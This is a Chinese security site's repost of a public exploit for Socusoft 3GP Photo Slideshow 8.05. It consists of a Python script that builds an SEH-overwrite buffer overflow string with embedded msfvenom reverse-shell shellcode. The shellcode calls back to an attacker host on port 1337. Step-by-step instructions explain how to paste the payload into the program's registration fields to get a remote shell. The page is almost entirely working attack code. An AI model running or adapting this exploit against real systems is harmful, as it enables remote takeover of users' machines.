首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
来源:@Pwsecspirit 作者:Singh 发布时间:2018-09-11  
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
 
buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret  | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x2d\x0b\x03\x10"
nops = "\x90" * 18
#Badchar \x00\x0a\x0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
 
buf =  ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
 
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(exploit)
    f.write(exploit)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SocuSoft iPod Photo Slideshow
·LW-N605R 12.20.2.1486 - Remote
·RPi Cam Control < 6.4.25 - 'pr
·Photo To Video Converter Profe
·Apache Struts 2 Namespace Redi
·Microsoft Baseline Security An
·iSmartViewPro 1.5 - 'SavePath
·Flash Slideshow Maker Professi
·DVD Photo Slideshow Profession
·Any Sound Recorder 2.93 - Deni
·Apache Roller 5.0.3 - XML Exte
·Zenmap (Nmap) 7.70 - Denial of
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved